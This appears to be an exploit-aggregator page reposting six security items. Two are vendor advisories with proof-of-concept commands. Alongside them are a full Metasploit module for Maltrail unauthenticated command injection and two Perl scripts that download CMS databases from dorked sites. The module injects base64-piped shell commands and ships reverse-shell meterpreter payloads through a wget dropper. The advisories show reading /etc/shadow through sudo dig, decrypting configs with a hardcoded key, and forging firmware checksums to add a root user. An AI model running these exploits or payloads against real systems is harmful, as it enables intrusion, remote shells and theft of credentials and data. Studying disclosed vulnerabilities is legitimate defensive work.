Latest exploits :: CodePwn

<pre><code>KL-001-2023-001: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig Advisory ID: KL-001-2023-001 Publication Date: 2023.08.17 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-001.txt 1. Vulnerability Details Affected Vendor: ThousandEyes Affected Product: ThousandEyes Enterprise Agent Virtual Appliance Affected Version: thousandeyes-va-64-18.04 0.218 Platform: Linux / Ubuntu 18.04 CWE Classification: CWE-1395: Dependency on Vulnerable Third-Party Component, CWE-1220: Insufficient Granularity of Access Control CVE ID: CVE-2023-20217 2. Vulnerability Description An insecure sudo configuration permits a low-privilege user to read root-only files via the 'dig' command without a password. 3. Technical Description The ThousandEyes Virtual Appliance is distributed with a restrictive set of commands that can be executed via sudo, without having to provide the password for the 'thousandeyes' account. However, the ability to execute dig via sudo, allows for reading of arbitrary files using dig's "batch" mode. This mode allows a user to specify a file of requests, one per line. The dig command will read the file with elevated privileges and display the resulting queries (i.e. file contents) back to the user. thousandeyes@thousandeyes-va:~$ id uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare) thousandeyes@thousandeyes-va:~$ sudo -l Matching Defaults entries for thousandeyes on thousandeyes-va: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User thousandeyes may run the following commands on thousandeyes-va: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent, /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-* (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump Here we see that dig is available as root with no password, and no restrictions on the arguments it can be passed. thousandeyes@thousandeyes-va:~$ sudo /usr/bin/dig -f /etc/shadow ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> root:!:19145:0:99999:7::: ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 40036 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 65494 ;; QUESTION SECTION: ;root:!:19145:0:99999:7:::. IN A ;; Query time: 0 msec ;; SERVER: 127.0.0.53#53(127.0.0.53) ;; WHEN: Fri Mar 31 08:00:38 UTC 2023 ;; MSG SIZE rcvd: 54 ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> daemon:!*:18885:0:99999:7::: ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 32743 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 65494 ;; QUESTION SECTION: ;daemon:!*:18885:0:99999:7:::. IN A ... ;thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.Fb... ... 4. Mitigation and Remediation Recommendation The vendor has released a version which remediates the described vulnerability. Release notes are available at: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E 5. Credit This vulnerability was discovered by Jim Becher and Hank Leininger of KoreLogic, Inc. 6. Disclosure Timeline 2023.04.26 - KoreLogic submits vulnerability details to Cisco. 2023.04.26 - Cisco acknowledges receipt and the intention to investigate. 2023.05.04 - Cisco notifies KoreLogic that a remediation for this vulnerability is expected to be available within 90 days. 2023.06.30 - 45 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2023.07.11 - Cisco informs KoreLogic that the issue has been remediated in the latest ThousandEyes Virtual Appliance and a public advisory will be released 2023.08.16. 2023.07.24 - 60 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2023.08.09 - Cisco provides KoreLogic with CVE-2023-20217 to track this vulnerability. 2023.08.16 - Cisco public acknowledgement. 2023.08.17 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2023 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Maltrail Unauthenticated Command Injection', 'Description' => %q{ Maltrail is a malicious traffic detection system, utilizing publicly available blacklists containing malicious and/or generally suspicious trails. The Maltrail versions < 0.54 is suffering from a command injection vulnerability. The `subprocess.check_output` function in `mailtrail/core/http.py` contains a command injection vulnerability in the `params.get("username")` parameter. An attacker can exploit this vulnerability by injecting arbitrary OS commands into the username parameter. The injected commands will be executed with the privileges of the running process. This vulnerability can be exploited remotely without authentication. Successfully tested against Maltrail versions 0.52 and 0.53. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege BALCI <egebalci[at]pm.me>', # msf module 'Chris Wild', # original PoC, analysis ], 'References' => [ ['EDB', '51676'], ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'], ['URL', 'https://github.com/stamparm/maltrail/issues/19146'] ], 'Platform' => ['unix', 'linux'], 'Privileged' => false, 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => :wget, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2023-07-31', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [] } ) ) register_options( [ Opt::RPORT(8338), OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/']) ] ) end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'GET' ) return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{$v([0-9.]+)$} if version < Rex::Version.new('0.54') return CheckCode::Appears("Version Detected: #{version}") end CheckCode::Safe("Version Detected: #{version}") end def execute_command(cmd, _opts = {}) send_request_raw( # This needs to be a raw requess cuz we don't wanna URL encode the body 'uri' => normalize_uri(target_uri.path, 'login'), 'method' => 'POST', 'headers' => { 'ctype' => 'application/x-www-form-urlencoded' }, 'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # We also need all the + ) end def exploit case target['Type'] when :unix_cmd print_status("Executing #{target.name}...") execute_command(payload.encoded) when :linux_dropper print_status("Executing #{target.name}...") execute_cmdstager end end end </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-054 Product: AudioCodes VoIP Phones Manufacturer: AudioCodes Ltd. Affected Version(s): Firmware Versions >= 3.4.8.M4 Tested Version(s): Firmware Version 3.4.4.1000 Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2022-11-11 Solution Date: N.A. Public Disclosure: 2023-08-10 CVE Reference: CVE-2023-22956 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: AudioCodes VoIP phones are modern desk phones which are used for the operation in enterprise environments. The manufacturer describes the product as follows (see [1]): "The AudioCodes 400HD series of IP phones is a range of easy-to-use, feature-rich desktop devices for the service provider hosted services, enterprise IP telephony and contact center markets. Based on the same advanced, field-proven underlying technology as our other VoIP products, AudioCodes high quality IP phones enable systems integrators and end customers to build end-to-end VoIP solutions." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The AudioCodes VoIP phones can be managed centrally, whereby configuration files are provided and requested by the phones at a central location. These configuration files can also be provided in encrypted form. This is intended to protect sensitive information within the configuration files from unauthorized access. Due to the use of a hardcoded cryptographic key, an attacker is able to decrypt encrypted configuration files and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By analyzing the ELF executable "decryption_tool" of an AudioCodes IP phone firmware in a disassembler and decompiler, e.g. Ghidra, the encryption mechanism could be reversed and the hardcoded cryptographic key could be extracted. Used encryption algorithm: Triple DES in CBC mode Memory address of the 64-byte secret for OpenSSL key and IV derivation: 00001e8f Extracting the secret: #> offset=$(python3 -c 'print(int("00001e8f", base=16))') #> dd skip=$offset count=64 if=decryption_tool of=secret.bin bs=1 Deriving the key and IV from the 64-byte secret: #> openssl enc -des-ede3-cbc -P -pass pass:h4dArat[...] -nosalt key = 40DA61FB4831FF53[...] iv = C614B77A[..] With the derived key and IV, it is possible to decrypt encrypted configuration files. As a proof of concept, the OpenSSL command-line tool can be used for decryption: #> openssl enc -d -des-ede3-cbc -pass pass:h4dArat[...] -nosalt \ -in /tmp/encrypted_config.cfg -out /tmp/plain_config.cfg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update devices to firmware version 3.4.8.M4 and define an individual and strong secret from which the encryption key is derived. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-11-03: Vulnerability discovered 2022-11-11: Vulnerability reported to manufacturer 2022-12-12: Vulnerability confirmed by AudioCodes Ltd. 2023-01-19: AudioCodes Ltd. adapts the documentation so that it no longer states that the passwords are encrypted but obfuscated 2023-07-13: AudioCodes Ltd. informs that the upcoming release 3.4.8.M4 will include a feature that allows setting a custom password from which the key will be derived 2023-08-10: Public disclosure at BlackHat USA[4] 2023-08-11: Public disclosure athttps://blog.syss.com[5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] AudioCodes IP Phones Product Website https://www.audiocodes.com/solutions-products/products/ip-phones [2] SySS Security Advisory SYSS-2022-054 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-054.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] BlackHat USA Briefings Session https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341 [5] Detailed Blog Post https://blog.syss.com/posts/zero-touch-pwn/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmS30X4ACgkQrgyb+PE0 i1O6EQ//fO27JxW5z0SwoMTfeW/ciyFskSLhAC3fK3NFGKO6fdvGiZR0wrY6ar4E VxSpYp2QIqxrr5SDGJlm3DBTzsRT7aQPz/kQn7YvB78MsMf7aMxd7Z1cGyuI5qb4 YElvIPtRnkcgovNoVeoxqgUVIFxI6xFSYXmU1camUpjO7wq5R8aH7uhJsbdbvQBE xlObEWNOzafpo0zwyvc3GjinzZSsmVw9uIGeJyZprBctW4HKos1ReI9/0+UPmXuW dafHOPtuuRaE4g+pLsUhVxEO+XcAnjEd1ZwhWIJpYgGMNyceN4muHDToxPwNLZh2 QJQHKr3JguxSpsS1Kp16WJawY7YIfkA7tBRmlIv/Oil/XhcJF7efgAwVZLD6vEpN ZFU/kQTdy8TOnPQue40qB4WVmhq5YvffsVrP97rjhNHRA0Pk9ytxruMr0p09blJ6 5vhAss7cOaFZlFJFs7OGRLe/jpc1blySBUYsLjnm+OZ2rLWbe0R9VFYMsovzUu1W 4HxlXZo41yN/VKPUNvMA4tGZ8+dXLBx+p5x0KKossp+ZWkOFwG9+tqK2ZOsagMV6 Y5XZb66xK8a5R6N0dgbpOpIsvV+lpQJPMFY2sfsK8n1k/b7b5uoxLKbH/AflPWRD dvKvVKkrUvxx2NHtVM4EdFcrsnE6b/s+1H7X6bXzD5KkeW6vIkc= =Mo8G -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-055 Product: AudioCodes VoIP Phones Manufacturer: AudioCodes Ltd. Affected Version(s): Firmware Versions >= 3.4.4.1000 Tested Version(s): Firmware Version 3.4.4.1000 Vulnerability Type: Missing Immutable Root of Trust in Hardware (CWE-1326) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2022-11-14 Solution Date: N.A. Public Disclosure: 2023-08-10 CVE Reference: CVE-2023-22955 Authors of Advisory: Matthias Deeg, SySS GmbH Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: AudioCodes VoIP phones are modern desk phones which are used for the operation in enterprise environments. The manufacturer describes the product as follows (see [1]): "The AudioCodes 400HD series of IP phones is a range of easy-to-use, feature-rich desktop devices for the service provider hosted services, enterprise IP telephony and contact center markets. Based on the same advanced, field-proven underlying technology as our other VoIP products, AudioCodes high quality IP phones enable systems integrators and end customers to build end-to-end VoIP solutions." Due to insufficient firmware validation, an attacker can store malicious firmware on AudioCodes IP phones. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the firmware image and update mechanism of AudioCodes IP phones, it was identified that parsing and verification of the firmware image is done by the ELF executable "flasher" which is executed from the script "run_ramfs_for_upgrade.sh" located at the path "/home/ipphone/scripts/". When analyzing the software tool "flasher", SySS found out that the validation of firmware images only consists of simple checksum checks for different firmware components. Thus, by knowing how to calculate and where to store the required checksums for the "flasher" tool, an attacker is able to store malicious firmware on AudioCodes IP phones. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An AudioCodes IP phone's firmware image file contains an image header followed by different sections, e.g.: 1. Firmware image header 2. bootloader.img 3. rootfs.ext4 4. phone.img 5. section.map 6. flasher 7. release 8. end.section Each section starts with the 4 magic bytes "0xBB 0xBB 0xBB 0xBB" followed by a 4-byte section header size field ("0x60 0x00 0x00 x00") and other metadata like length fields and a checksum at the offset 0x50. This checksum is calculated by adding up all bytes of the section data starting at the section offset 0x60. As a proof of concept, a manipulated firmware image file was created in which an additional user with root privileges was added in the "rootfs.ext4" section. After recalculating the checksum and updating the section header with its checksum, the manipulated firmware image could be successfully uploaded and installed on an AudioCodes IP phone. To automate this task, a simple Python script has been developed to deal with AudioCodes IP phone firmware images. The following output exemplarily shows how a modified firmware image for the AudioCodes IP phone C450HD was updated with correct checksums: #> python3 audiocodes-firmware-tool.py -i AudioCodes_UCC450HD_3.4.6.604.1.img -u AudioCodes Firmware Tool v0.3 by Matthias Deeg - SySS GmbH (c) 2022 - --- Image infos =========== Hardware: C450HD Software: UC_3.4.6.604.1 Version: 25 (0x19) Number of sections: 4 Header length: 112 (0x70) Checksum: 0x00000877 Calculated checksum: 0x00000877 Attribute: 7 (0x00000007) Date: 2021-12-13_09:07:38 CE5: 0 - --- Section name: bootloader.img Section checksum: 0x0247D1A3 Calculated checksum: 0x0247D1A3 Data size (8-byte aligned): 423992 (0x67838) Data size : 423992 (0x67838) - --- Section name: rootfs.ext4 Section checksum: 0x78EF3E3D Calculated checksum: 0x78EF3E6D Data size (8-byte aligned): 134238208 (0x8005000) Data size : 134238208 (0x8005000) - --- [...] [*] Saved updated firmware image to AudioCodes_UCC450HD_3.4.6.604.1.img.new ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Not yet fixed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-11-10: Vulnerability discovered 2022-11-14: Vulnerability reported to manufacturer 2022-12-12: Vulnerability confirmed by AudioCodes Ltd. 2023-01-19: AudioCodes Ltd. informs that a solution is planned in 2023 2023-07-13: AudioCodes Ltd. sets solution date to the end of 2023 2023-08-10: Public disclosure at BlackHat USA[4] 2023-08-11: Public disclosure athttps://blog.syss.com[5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] AudioCodes IP Phones Product Website https://www.audiocodes.com/solutions-products/products/ip-phones [2] SySS Security Advisory SYSS-2022-055 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-055.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] BlackHat USA Briefings Session https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341 [5] Detailed Blog Post https://blog.syss.com/posts/zero-touch-pwn/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Matthias Deeg and Moritz Abrell of SySS GmbH. E-Mail:matthias.deeg@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc Key Fingerprint: D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmS30ZUACgkQrgyb+PE0 i1NVOxAAsQxeEAuUDwJYIx9/dmnE8TOyl+f9VKtxO7OMSCtsFcbhFTKQD1jm1lMl DKd0HAhWNWi5r87cf4tAUy8QD8NKrXCZljdUE93ZRmwWZHNmuTiyjCHzTHFr/qLG rcfjiaSZawaeaSUE8LSFrZhXiYoWe+ZHsebnm96/DkMryCJ6txbXFKQlKY/MtKSb iinmG6bcWGrlTJXO91OROnpmMioVDIW8YeGaoh87oaLlAsHTCBaKJgdndo3hi5QA 2k0aRsbunJ2UyBAKA2OPwNO+FoHJ4mBvu9b+HZYEUyhtqZ898pjxJg52C7lXfcui wpb4Chh7thVhvjogMnchV1BUSRxbigoeYHywp54YxLTX336wuu0mLYjdalnB0Abx ejiz0ShqznYCkiKfsj+D7kh7DE+uwX5kVQGREFwu0gnJBQsibYgUCUplCM4Ybov7 gHmz1QwRg0pZ4OZLw3bzZeVcXQ/PrCUGDPpILg6IVW5o6bweAnpMsa5v3HhWtN7V LYGq9FlhhejuCajfYW4NbURCBjNfaC1Bb3xEIEM0bPDZMIgl8uK8UZKtNazSYkgM LXo4psv8CwNnUVV1vnw76xvacn6B+UwpiTLNiNCuhuVcBXPp3j9VwiwzWjrsotL4 Gl6ukPl08qS8Z1tGTBtTeWT5qJ1M+ne/9eQtzxgWH2Y3kBwko+U= =wsHl -----END PGP SIGNATURE----- </code></pre>

<pre><code>==================================================================================================================================== | # Title : ExcessWeb & Network CMS v4.0 Database Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) | | # Vendor : http://www.excessweb.co.th/ | | # Dork : Powered by ExcessWeb & Network | ==================================================================================================================================== poc : [-] Download the database: The following Perl exploit will attempt to download the (acart.mdb ) file The (acart.mdb) It is the database and contains all the data . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # # ExcessWeb & Network CMS v4.0 Database Disclosure Exploit # # Author : indoushka # # Vondor : ToastForums.com use LWP::Simple; use LWP::UserAgent; system('cls'); print ('ExcessWeb & Network CMS v4.0 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="database/Webdatas.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/acart.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/acart.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Erim Upload V4 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://script.horje.com/view/218412 | ==================================================================================================================================== poc : [-] Download the database: The following Perl exploit will attempt to download the (upload/veritabani/erimicel.mdb ) file The (upload/veritabani/erimicel.mdb) It is the database and contains all the data . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # # Erim Upload V4 Database Disclosure Exploit # # Author : indoushka # # Vondor : script.horje.com/view/218412 use LWP::Simple; use LWP::UserAgent; system('cls'); print ('Erim Upload V4 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="upload/veritabani/erimicel.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/erimicel.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/erimicel.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>